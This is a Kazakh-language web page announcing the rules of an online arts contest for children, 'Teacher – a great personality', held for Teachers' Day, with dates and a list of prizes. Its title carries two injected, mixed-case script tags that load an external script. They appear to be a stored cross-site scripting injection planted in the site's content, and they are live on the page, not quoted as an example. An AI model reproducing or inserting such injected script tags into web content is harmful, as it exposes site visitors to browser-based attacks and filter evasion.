«ҰСТАЗ – ҰЛЫ ТҰЛҒА» РЕСПУБЛИКАЛЫҚ БАЛАЛАР МЕН ЖАСӨСПІРІМДЕР АРАСЫНДАҒЫ ОНЛАЙН ӨНЕР БАЙҚАУЫНЫҢ ЕРЕЖЕСІ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
22.09.2020
«Алтын ғасыр» шығармашылық орталығы «Ұстаздар күні» мерекесіне орай қыркүйек айының 20-сы мен қазан айының 8-і аралығында «Ұстаз – ұлы тұлға» атты Республикалық байқау ұйымдастырады.
ДИПЛОМДАР, СЫЙЛЫҚТАР:
Басты сыйлық – Ұялы телефон. Әділқазылар алқасының шешімі бойынша төрт жанрдан таңдалып, ең үздік төрт өнерпазға сыйлыққа ұялы телефон беріледі.
Бас жүлдеге – диплом, медаль және кітап беріледі. (қазақ ақын-жазушыларының кітабынан)
Орын алған қатысушыға – диплом және медаль беріледі.
Жетекшіге – «Үздік ұстаз» дипломы мен арнайы блакнот беріледі.
Қатысушы мен жетекшінің дипломдары электронды түрде ватсап нөмірлеріне немесе электронды почтаға жіберіледі.
Медаль мен кітап, блакнот,қалам сыйлықтары Казпочта арқылы жөнелтіледі.
Сыздыкова А.
Просмотров: 837